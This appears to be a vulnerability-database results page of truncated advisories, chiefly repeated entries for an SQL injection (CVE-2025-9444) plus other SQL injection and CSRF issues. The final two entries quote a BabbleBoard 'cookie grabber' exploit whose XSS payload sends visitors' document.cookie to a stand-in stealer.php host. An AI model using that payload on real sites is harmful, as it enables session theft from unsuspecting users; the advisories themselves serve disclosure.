EUVD-2025-25781

Malicious code in bioql PyPI...

CVE-2025-9444

A vulnerability has been found in 1000projects Online Project Report Submission and Evaluation System 1.0. This issue affects some unknown processing of the file /admin/controller/deletegroupstudent.php. The manipulation of the argument batchid leads to sql injection. The attack can be initiated...

CVE-2025-9444

A vulnerability has been found in 1000projects Online Project Report Submission and Evaluation System 1.0. This issue affects some unknown processing of the file /admin/controller/deletegroupstudent.php. The manipulation of the argument batchid leads to sql injection. The attack can be initiated...

CVE-2025-9444

A vulnerability has been found in 1000projects Online Project Report Submission and Evaluation System 1.0. This issue affects some unknown processing of the file /admin/controller/deletegroupstudent.php. The manipulation of the argument batchid leads to sql injection. The attack can be initiated...

CVE-2025-9444

The CVE concerns 1000projects Online Project Report Submission and Evaluation System 1.0. A SQL injection vulnerability exists in the file /admin/controller/delete_group_student.php, triggered by manipulating the batch_id parameter. This remote attack surface could lead to unauthorized data expos...

CVE-2025-9444 1000projects Online Project Report Submission and Evaluation System delete_group_student.php sql injection

A vulnerability has been found in 1000projects Online Project Report Submission and Evaluation System 1.0. This issue affects some unknown processing of the file /admin/controller/deletegroupstudent.php. The manipulation of the argument batchid leads to sql injection. The attack can be initiated...

CVE-2025-9444 1000projects Online Project Report Submission and Evaluation System delete_group_student.php sql injection

A vulnerability has been found in 1000projects Online Project Report Submission and Evaluation System 1.0. This issue affects some unknown processing of the file /admin/controller/deletegroupstudent.php. The manipulation of the argument batchid leads to sql injection. The attack can be initiated...

1000 Projects Online Project Report Submission and Evaluation System Security Vulnerability

1000 Projects Online Project Report Submission and Evaluation System is a 1000 Projects open source online project report submission and evaluation system . 1000 Projects Online Project Report Submission and Evaluation System version 1.0 has a security vulnerability , the vulnerability stems from...

PT-2025-34732

Name of the Vulnerable Software and Affected Versions: 1000projects Online Project Report Submission and Evaluation System version 1.0 Description: A SQL injection issue exists due to the manipulation of the batch id argument in the processing of the /admin/controller/delete group student.php fil...

CVE-2024-41618

Money Manager EX WebApp web-money-manager-ex 1.2.2 is vulnerable to SQL Injection in the transactiondeletegroup function. The vulnerability is due to improper sanitization of user input in the TrDeleteArr parameter, which is directly incorporated into an SQL query...

CVE-2024-41618

Money Manager EX WebApp web-money-manager-ex 1.2.2 is vulnerable to SQL Injection in the transactiondeletegroup function. The vulnerability is due to improper sanitization of user input in the TrDeleteArr parameter, which is directly incorporated into an SQL query...

CVE-2024-42581

A Cross-Site Request Forgery CSRF in the component deletegroup.php of Warehouse Inventory System v2.0 allows attackers to escalate privileges...

PT-2024-30043 · Unknown · Warehouse Inventory System

Name of the Vulnerable Software and Affected Versions: Warehouse Inventory System version 2.0 Description: A Cross-Site Request Forgery CSRF issue in the delete group.php component allows attackers to escalate privileges. Recommendations: For Warehouse Inventory System version 2.0, consider...

Warehouse Inventory System 安全漏洞

Warehouse Inventory System is a Warehouse Inventory Management System by Siamon Hasan Personal Developer. A cross-site request forgery vulnerability exists in Warehouse Inventory System v2.0, which stems from the deletegroup.php component not adequately verifying that a request comes from a trust...

PT-2021-9640 · Phpgacl · Phpgacl

Name of the Vulnerable Software and Affected Versions: phpGACL version 3.3.7 Description: The issue allows for SQL injection through a specially crafted HTTP request. In the file admin/edit group.php, when the POST parameter action is set to “Delete”, the POST parameter delete group can lead to a...

DiliCMS Cross-Site Request Forgery Vulnerability

DiliCMS is a rapid development content management system based on CodeIgniter. DiliCMS 2.4.0 suffers from a cross-site request forgery vulnerability that can be exploited by an attacker to delete a user or group via the admin/index.php/user/del/1 or admin/index.php/role/del/2 URIs...

BabbleBoard 1.1.6 XSRF

BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : document.location ="http://yourdomain/path/stealer.php?cookie=" + document.cookie; Everyone who visit the index page will be...

BabbleBoard 1.1.6 (username) CSRF/Cookie Grabber Exploit

No description provided by source. + BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : scriptdocument.location ="http://yourdomain/path/stealer.php?cookie=" +...